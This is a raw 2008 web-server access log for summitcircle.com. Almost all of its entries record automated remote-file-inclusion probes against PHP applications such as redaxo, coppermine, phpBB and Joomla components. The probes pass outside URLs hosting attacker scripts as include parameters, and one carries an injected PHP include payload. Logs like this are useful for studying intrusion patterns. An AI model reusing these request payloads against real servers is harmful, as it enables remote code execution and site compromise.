69.72.153.58 - - [10/Aug/2008:17:51:20 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:17:51:37 -0700] "GET /logs/access_080204.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:17:51:37 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.72.153.58 - - [10/Aug/2008:17:51:45 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.summitcircle.com"
69.72.153.58 - - [10/Aug/2008:17:51:45 -0700] "GET /classes/core/language.php?rootdir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:17:52:09 -0700] "GET /logs/access_080224.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
81.169.158.65 - - [10/Aug/2008:17:52:40 -0700] "GET /logs/access_080323.log/errors.php?error=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
67.15.205.17 - - [10/Aug/2008:17:54:10 -0700] "GET /logs/access_071112.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
67.15.205.17 - - [10/Aug/2008:17:54:11 -0700] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
67.15.205.17 - - [10/Aug/2008:17:54:11 -0700] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
195.5.163.212 - - [10/Aug/2008:17:56:52 -0700] "GET /logs//include/write.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:17:56:54 -0700] "GET //include/write.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
129.142.67.13 - - [10/Aug/2008:17:57:51 -0700] "GET /logs/access_071217.log//vwar/convert/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
129.142.67.13 - - [10/Aug/2008:17:57:51 -0700] "GET /logs/access_071217.log//vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
129.142.67.13 - - [10/Aug/2008:17:57:51 -0700] "GET //vwar/convert/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
129.142.67.13 - - [10/Aug/2008:17:57:51 -0700] "GET //vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
129.142.67.13 - - [10/Aug/2008:17:57:51 -0700] "GET /logs//vwar/convert/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
129.142.67.13 - - [10/Aug/2008:17:57:51 -0700] "GET /logs//vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.86.236.106 - - [10/Aug/2008:17:58:16 -0700] "GET /logs/access_080114.log//calendar.php?pg=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
70.86.236.106 - - [10/Aug/2008:17:58:17 -0700] "GET //calendar.php?pg=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
70.86.236.106 - - [10/Aug/2008:17:58:17 -0700] "GET /logs//calendar.php?pg=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
129.142.67.13 - - [10/Aug/2008:17:58:18 -0700] "GET /logs/access_080210.log//vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
129.142.67.13 - - [10/Aug/2008:17:58:21 -0700] "GET /logs/access_080210.log//vwar/convert/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:17:58:33 -0700] "GET //functions.php?include_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:17:58:34 -0700] "GET /logs//functions.php?include_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.summitcircle.com"
194.79.75.195 - - [10/Aug/2008:17:58:54 -0700] "GET //historytemplate.php?cms[support]=1&cms[tngpath]=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.summitcircle.com"
194.79.75.195 - - [10/Aug/2008:17:58:54 -0700] "GET /logs//historytemplate.php?cms[support]=1&cms[tngpath]=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.summitcircle.com"
76.91.239.253 - - [10/Aug/2008:18:00:59 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2000.2472-big; Windows XP 5.1; MSIE 7.0.5730.11)" "summitcircle.com"
76.91.239.253 - - [10/Aug/2008:18:00:59 -0700] "GET /favicon.gif HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2000.2472-big; Windows XP 5.1; MSIE 7.0.5730.11)" "summitcircle.com"
67.15.205.17 - - [10/Aug/2008:18:02:50 -0700] "GET /logs/access_080107.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://stretto-cafe.com/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.15.205.17 - - [10/Aug/2008:18:02:50 -0700] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://stretto-cafe.com/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.15.205.17 - - [10/Aug/2008:18:02:50 -0700] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://stretto-cafe.com/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
82.192.70.11 - - [10/Aug/2008:18:05:34 -0700] "GET /logs/access_080414.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/penjahat_lase/scan/dosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
82.192.70.11 - - [10/Aug/2008:18:05:40 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/penjahat_lase/scan/dosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
82.192.70.11 - - [10/Aug/2008:18:05:45 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://geocities.com/penjahat_lase/scan/dosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.summitcircle.com"
207.44.244.37 - - [10/Aug/2008:18:06:15 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.summitcircle.com"
67.15.205.17 - - [10/Aug/2008:18:06:47 -0700] "GET /logs/access_071112.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://stretto-cafe.com/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
67.15.205.17 - - [10/Aug/2008:18:06:47 -0700] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://stretto-cafe.com/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
67.15.205.17 - - [10/Aug/2008:18:06:47 -0700] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://stretto-cafe.com/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
70.85.102.100 - - [10/Aug/2008:18:08:36 -0700] "GET /errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:18:08:36 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:09:06 -0700] "GET /logs/access_071231.log/index.php?pagina=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:09:07 -0700] "GET /logs/access_071008.log/index.php?pagina=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
70.85.102.132 - - [10/Aug/2008:18:09:19 -0700] "GET /errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.summitcircle.com"
70.85.102.132 - - [10/Aug/2008:18:09:19 -0700] "GET /logs/errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.summitcircle.com"
70.86.236.106 - - [10/Aug/2008:18:10:46 -0700] "GET /logs/access_080210.log//calendar.php?pg=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.44.244.37 - - [10/Aug/2008:18:11:37 -0700] "GET /logs/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
207.44.244.37 - - [10/Aug/2008:18:11:37 -0700] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:18:11:57 -0700] "GET //modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:18:11:57 -0700] "GET /logs//modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.summitcircle.com"
202.70.83.4 - - [10/Aug/2008:18:13:22 -0700] "GET /logs/access_071126.log//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
70.85.102.132 - - [10/Aug/2008:18:13:27 -0700] "GET /errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.summitcircle.com"
70.85.102.132 - - [10/Aug/2008:18:13:27 -0700] "GET /logs/errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.summitcircle.com"
202.70.83.4 - - [10/Aug/2008:18:13:31 -0700] "GET /logs/access_071001.log//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:18:14:27 -0700] "GET /logs/access_080406.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:18:14:27 -0700] "GET /logs/access_080406.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:18:14:27 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:18:14:27 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:18:14:27 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 5943 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:18:14:27 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 5943 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:15:06 -0700] "GET /logs/access_080406.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:15:06 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:15:06 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 5943 "-" "libwww-perl/5.79" "www.summitcircle.com"
194.79.75.195 - - [10/Aug/2008:18:15:58 -0700] "GET /errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:18:17:26 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:18:17:27 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:18:19:15 -0700] "GET /logs/access_080107.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:18:19:30 -0700] "GET /logs/access_080107.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:19:33 -0700] "GET /logs/access_080107.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:18:20:34 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:21:40 -0700] "GET /logs/access.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:21:40 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:21:40 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 5943 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:21:55 -0700] "GET /logs/access_071119.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:21:55 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:21:55 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 5943 "-" "libwww-perl/5.79" "summitcircle.com"
194.79.75.195 - - [10/Aug/2008:18:22:40 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.summitcircle.com"
194.79.75.195 - - [10/Aug/2008:18:22:40 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:18:22:50 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:18:22:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.summitcircle.com"
89.111.172.23 - - [10/Aug/2008:18:23:04 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
89.111.172.23 - - [10/Aug/2008:18:23:04 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.245.226.25 - - [10/Aug/2008:18:23:06 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
210.245.226.25 - - [10/Aug/2008:18:23:06 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
65.55.208.16 - - [10/Aug/2008:18:23:20 -0700] "GET /logs/?D=D HTTP/1.1" 200 5943 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
216.246.46.85 - - [10/Aug/2008:18:24:01 -0700] "GET /logs/access_080204.log//index.php?page=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
216.246.46.85 - - [10/Aug/2008:18:24:02 -0700] "GET //index.php?page=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
216.246.46.85 - - [10/Aug/2008:18:24:02 -0700] "GET /logs//index.php?page=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
207.44.244.37 - - [10/Aug/2008:18:24:12 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.summitcircle.com"
207.44.244.37 - - [10/Aug/2008:18:24:12 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.summitcircle.com"
72.29.70.187 - - [10/Aug/2008:18:25:31 -0700] "GET /logs/access_080204.log//index.php?page=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
72.29.70.187 - - [10/Aug/2008:18:25:31 -0700] "GET //index.php?page=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
72.29.70.187 - - [10/Aug/2008:18:25:31 -0700] "GET /logs//index.php?page=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:18:26:32 -0700] "GET /logs/access_080421.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
66.230.197.245 - - [10/Aug/2008:18:27:50 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
69.65.41.92 - - [10/Aug/2008:18:30:13 -0700] "GET /index.php?op=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
69.65.41.92 - - [10/Aug/2008:18:30:13 -0700] "GET /logs/index.php?op=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
194.79.75.195 - - [10/Aug/2008:18:31:26 -0700] "GET /logs/access_080406.log/errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
194.79.75.195 - - [10/Aug/2008:18:31:26 -0700] "GET /logs/errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.249.32.13 - - [10/Aug/2008:18:31:31 -0700] "GET /logs/access_080406.log//skin/zero_vote/ask_password.php?dir=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
216.249.32.13 - - [10/Aug/2008:18:31:31 -0700] "GET /logs/access_080406.log//skin/zero_vote/ask_password.php?dir=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
